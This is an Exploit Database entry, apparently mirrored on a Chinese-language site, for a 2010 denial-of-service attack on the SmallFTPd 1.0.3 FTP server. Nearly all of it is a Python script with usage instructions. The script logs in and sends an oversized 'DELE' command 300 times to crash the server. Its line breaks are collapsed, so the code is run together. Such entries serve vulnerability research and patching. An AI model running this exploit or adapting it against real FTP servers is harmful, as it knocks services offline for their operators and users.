SmallFTPd 1.0.3 – ‘DELE’ Denial of Service

• Exploit Database
• 101 阅读

• 作者： Jeremiah Talamantes
  日期： 2010-05-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12603/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

  # Tested on: Windows XP, SP2 (EN) #!/usr/bin/python print "\n#################################################################" print "##RedTeam Security ##" print "## SmallFTPD FTP Server DELE Command DoS ##" print "##Version 1.0.3##" print "## ##" print "## Jeremiah Talamantes ##" print "## labs@redteamsecure.com##" print "################################################################# \n"   import socket import sys   # Define the exploit&apos;s usage def Usage(): print ("Usage: scriptname.py <IP> <username> <password>\n") print ("\n\nCredit: Jeremiah Talamantes") print ("RedTeam Security : www.redteamsecure.com/labs\n")   # Buffer buffer="A" * 496   def exploit(hostname,username,password): i=0 while i < 300: i=i+1 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Error: unable to connect to host") sys.exit(1) r=sock.recv(1024) print "[+] " + r + ": running iteration number:",i sock.send("USER " + username + "\r\n") r=sock.recv(1024) sock.send("PASS " + password + "\r\n") r=sock.recv(1024) sock.send("DELE " + buffer + "\r\n") sock.close() if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] password=sys.argv[3] exploit(hostname,username,password) sys.exit(0)   # End